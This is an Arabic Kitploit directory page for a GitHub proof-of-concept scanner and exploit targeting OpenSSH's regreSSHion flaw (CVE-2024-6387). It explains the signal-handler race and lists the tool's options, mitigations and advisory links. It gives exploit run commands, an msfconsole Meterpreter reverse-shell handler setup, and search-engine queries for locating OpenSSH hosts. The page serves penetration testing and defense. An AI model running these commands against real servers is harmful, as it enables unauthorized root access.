Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-6387 — ثغرة تنفيذ كود عن بُعد بدون مصادقة في خادم OpenSSH (CVE-2024-6387) | Kitploit
أدوات/GitHubGitHub/karmakstylez/cve-2024-6387
الاستطلاعماسحات الثغرات الأمنيةالاستغلالأمن الشبكاتاختبار الاختراقأداة الوصول عن بعد
GitHubkarmakstylez/cve-2024-6387

CVE-2024-6387

ثغرة تنفيذ كود عن بُعد بدون مصادقة في خادم OpenSSH (CVE-2024-6387)

عرض المستودع
188476منذ 2 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

openssh CVE-2024-6387.py - PoC

ملاحظات هامة!!!

يعمل الاستغلال فقط على خوادم OpenSSH ذات 32 بت. وذلك لأن الإثبات يستخدم مؤشرات 32 بت! ومن المعروف أيضًا أن بعض الإصدارات قد تم تصحيحها بالفعل، وليس كل خادم معرض للخطر. تم اختباره على: Kali Linux، ParrotSec، Ubuntu 22.04

📜 الوصف

ثغرة تنفيذ كود عن بعد غير مصادق عليه في خادم OpenSSH

CVE-2024-6387.py هي أداة خفيفة الوزن وفعالة مصممة لتحديد الخوادم التي تشغل إصدارات معرضة للخطر من OpenSSH، وتستهدف تحديدًا ثغرة regreSSHion المكتشفة حديثًا (CVE-2024-6387). يسهل هذا البرنامج النصي المسح السريع لعناوين IP متعددة وأسماء النطاقات ونطاقات شبكة CIDR لاكتشاف الثغرات المحتملة وضمان أمان بنيتك التحتية.

تم العثور على حالة سباق في معالج الإشارة في خادم sshd الخاص بـ OpenSSH، حيث لا يقوم العميل بالمصادقة خلال ثوانٍ LoginGraceTime (120 ثانية افتراضيًا، 600 ثانية في إصدارات OpenSSH القديمة)، ثم يتم استدعاء معالج SIGALRM الخاص بـ sshd بشكل غير متزامن. ومع ذلك، يقوم معالج الإشارة هذا باستدعاء وظائف مختلفة ليست آمنة للإشارات غير المتزامنة، على سبيل المثال، syslog().

📁 جدول المحتويات

  • 📖 التفاصيل
  • 🌟 الميزات
  • ⚙️ الاستخدام
  • O المخرجات
  • 🔍 اكتشاف المضيف
  • 🛠️ التخفيف
  • 💁 المراجع
  • 📌 المؤلف
  • 📢 إخلاء المسؤولية

✍🏻 التفاصيل

يمكنك العثور على التفاصيل الفنية هنا.

الخلل، الذي اكتشفه باحثون في Qualys في مايو 2024، وتم تعيين المعرف CVE-2024-6387 له، يرجع إلى حالة سباق في معالج الإشارة في sshd تسمح للمهاجمين عن بعد غير المصادق عليهم بتنفيذ كود عشوائي كجذر.

"إذا لم يقم العميل بالمصادقة خلال ثوانٍ LoginGraceTime (120 ثانية افتراضيًا)، فإن معالج SIGALRM الخاص بـ sshd يتم استدعاؤه بشكل غير متزامن ويستدعي وظائف مختلفة ليست آمنة للإشارات غير المتزامنة،"

"يمكن للمهاجم عن بعد غير المصادق عليه الاستفادة من هذا الخلل لتنفيذ كود عشوائي بصلاحيات الجذر."

🌟 الميزات

  • المسح السريع: امسح بسرعة عناوين IP متعددة وأسماء نطاقات ونطاقات CIDR بحثًا عن ثغرة CVE-2024-6387.
  • استرداد الشعار: يسترد شعارات SSH بكفاءة دون مصادقة.
  • كشف وقت السماح: اكتشف اختياريًا ما إذا كانت الخوادم قد خففت الثغرات باستخدام إعداد LoginGraceTime.
  • دعم IPv6: يدعم بالكامل عناوين IPv6 للمسح المباشر والقائم على اسم المضيف.
  • تعدد الخيوط: يستخدم خيوطًا للفحوصات المتزامنة، مما يقلل بشكل كبير من أوقات المسح.
  • مخرجات مفصلة: يوفر مخرجات واضحة ومشفرة بالرموز التعبيرية تلخص نتائج المسح.
  • فحص المنفذ: يحدد المنافذ المغلقة ويوفر ملخصًا للمضيفين غير المستجيبين.
  • كشف الإصدارات المصححة: يتعرف على الإصدارات المصححة المعروفة ويستبعدها من تقارير الثغرات.

⚙️ الاستخدام

مسح خادم OpenSSH

المتطلب: أحدث إصدار من python3

root@kitploit:~
### وسائط سطر الأوامر
mode: يحدد وضع التشغيل. الخيارات هي scan أو exploit.
-T, --targets: عناوين IP أو أسماء نطاقات أو مسارات ملفات تحتوي على عناوين IP أو نطاقات شبكة CIDR.
-f, --outputfile: ملف لحفظ النتائج (مثل result.json).
-g, --gracetimecheck: الوقت بالثواني للانتظار بعد تحديد الإصدار للتحقق من تخفيف LoginGraceTime (الافتراضي: 120 ثانية).
-n, --nic: بطاقة شبكة NIC (الافتراضي: 'eth0').
-o, --output: تنسيق المخرجات للنتائج (الخيارات: 'csv', 'txt', 'json').
-p, --port: رقم المنفذ للفحص أو الاستغلال (الافتراضي: 22).
-s, --speed: عدد الخيوط لزيادة فرص حالة السباق (الافتراضي: 10).
-t, --timeout: مهلة الاتصال بالثواني (الافتراضي: 1 ثانية).
-H, --resolve-hostnames: حل أسماء المضيفين

أمثلة

فحص عنوان URL/IP واحد

root@kitploit:~
python3 CVE-2024-6387.py scan -T example.com -p 22

تشغيل الاستغلال على نطاق / ip واحد

root@kitploit:~
python3 CVE-2024-6387.py exploit -T example.com -p 22 -n eth0

عملية التصعيد

استلام الـ payload

كل ما عليك فعله هو تشغيل الأمر أدناه أولاً (قم بتغيير معالج {yourip}) ثم قم بتشغيل الاستغلال بعد ذلك بالأمر أعلاه

root@kitploit:~
msfconsole -q -x "use exploit/multi/handler; set PAYLOAD linux/x64/meterpreter/reverse_tcp; set LHOST {yourip}; set LPORT 9999; exploit -j"

المخرجات

توفر الأداة مخرجات ملونة لوحدة التحكم لسهولة القراءة:

الأخضر: اتصال أو عملية ناجحة. الأحمر: فشل الاتصال أو خطأ. الأصفر: تحذيرات أو معلومات جديرة بالملاحظة. السماوي: معلومات عامة أو تحديثات الحالة.

🔍 اكتشاف المضيف

  • Hunter: /product.name="OpenSSH"
  • FOFA: app="OpenSSH"
  • SHODAN: product:"OpenSSH"
  • CENSYS: (openssh) and labels=remote-access

🛠️ التخفيف

  • إدارة التصحيحات: يعد تطبيق تصحيحات OpenSSH المتاحة بسرعة أمرًا بالغ الأهمية لسد فجوة الثغرة. يضمن التصحيح في الوقت المناسب عدم إمكانية استخدام الاستغلالات المعروفة ضد أنظمتك، مما يقلل من فرصة المهاجمين.

  • تعزيز التحكم في الوصول: يضيف تقييد الوصول إلى SSH عبر ضوابط قائمة على الشبكة طبقة دفاع إضافية. يقلل هذا النهج من التعرض للمهاجمين المحتملين عن طريق قصر اتصالات SSH على الشبكات أو عناوين IP المصرح بها فقط. يمكن أن يؤدي تنفيذ أدوات مثل قواعد جدار الحماية أو استخدام شبكات VPN للوصول الآمن إلى فرض هذه القيود بشكل فعال.

  • تقسيم الشبكة: يساعد تقسيم شبكتك إلى قطاعات في احتواء تأثير الاختراق المحتمل. من خلال تقسيم الأنظمة الهامة والبيانات الحساسة عن الأجزاء الأقل أهمية في شبكتك، فإنك تقلل من خطر الحركة الجانبية للمهاجمين. يمكن استكمال هذا التقسيم بضوابط وصول صارمة ومراقبة لكشف والرد على أي محاولات غير مصرح بها لاختراق هذه القطاعات.

  • أنظمة كشف التسلل (IDS): يتيح نشر أنظمة كشف التسلل أو أنظمة منع التسلل (IPS) المراقبة في الوقت الفعلي لحركة مرور الشبكة وسجلات النظام. يمكن لهذه الأنظمة اكتشاف الأنشطة المشبوهة ومحاولات الاستغلال المحتملة المرتبطة بثغرة regreSSHion. تسمح التنبيهات التي تطلقها هذه الأنظمة بالتحقيق والتخفيف الفوري قبل حدوث ضرر كبير.

  • مراقبة محاولات الاستغلال: تعد المراقبة المستمرة لسجلات الشبكة والنظام أمرًا بالغ الأهمية. ابحث عن أي أنماط أو أنشطة غير عادية قد تشير إلى محاولة لاستغلال ثغرة OpenSSH. يساعد هذا النهج الاستباقي في تحديد التهديدات والرد عليها قبل أن تتمكن من إحداث ضرر.

💁 المراجع

  • المؤلف الأصلي: ماسح CVE-2024-6387
  • المؤلف الأصلي: إثبات CVE-2024-6387

مراجع إضافية

  • http://www.openwall.com/lists/oss-security/2024/07/01/12
  • https://access.redhat.com/security/cve/CVE-2024-6387
  • https://bugzilla.redhat.com/show_bug.cgi?id=2294604
  • https://www.qualys.com/2024/07/01/cve-2024-6387/regresshion.txt
  • https://github.com/zgzhang/cve-2024-6387-poc
  • https://ubuntu.com/security/CVE-2024-6387
  • https://ubuntu.com/security/notices/USN-6859-1
  • https://www.suse.com/security/cve/CVE-2024-6387.html
  • https://explore.alas.aws.amazon.com/CVE-2024-6387.html
  • https://archlinux.org/news/the-sshd-service-needs-to-be-restarted-after-upgrading-to-openssh-98p1/
  • https://www.openssh.com/txt/release-9.8
  • https://lists.mindrot.org/pipermail/openssh-unix-announce/2024-July/000158.html
  • https://lists.mindrot.org/pipermail/openssh-unix-dev/2024-July/041431.html
  • https://blog.qualys.com/vulnerabilities-threat-research/2024/07/01/regresshion-remote-unauthenticated-code-execution-vulnerability-in-openssh-server
  • https://www.theregister.com/2024/07/01/regresshion_openssh/
  • https://news.ycombinator.com/item?id=40843778

📢 إخلاء المسؤولية

  • ملاحظة هامة:
    • تم تطوير هذه الأداة واستخدامها فقط لتمارين اختبار الاختراق والفرق الحمراء المصرح بها. وهي مصممة لتحديد واستغلال الثغرات في خادم OpenSSH على أنظمة Linux القائمة على glibc. الاستخدام غير المصرح به لهذه الأداة محظور تمامًا، مالك هذه الأداة ليس مسؤولاً عن أي وصول غير مصرح به أو استخدام ضار للأداة.
  • إشعار قانوني:
    • الاستخدام غير المصرح به لهذه الأداة على أنظمة أو شبكات دون إذن صريح من المالكين المعنيين قد ينتهك القوانين واللوائح المعمول بها. يتحمل المستخدمون مسؤولية ضمان الامتثال للمعايير القانونية والأخلاقية التي تحكم اختبارات وتقييمات الأمن السيبراني.
تنزيل الأداة
  • https://security-tracker.debian.org/tracker/CVE-2024-6387
  • https://github.com/oracle/oracle-linux/issues/149
  • https://github.com/rapier1/hpn-ssh/issues/87
  • https://stackdiary.com/openssh-race-condition-in-sshd-allows-remote-code-execution/
  • https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2024-0010
  • http://www.openwall.com/lists/oss-security/2024/07/01/13
  • https://security.netapp.com/advisory/ntap-20240701-0001/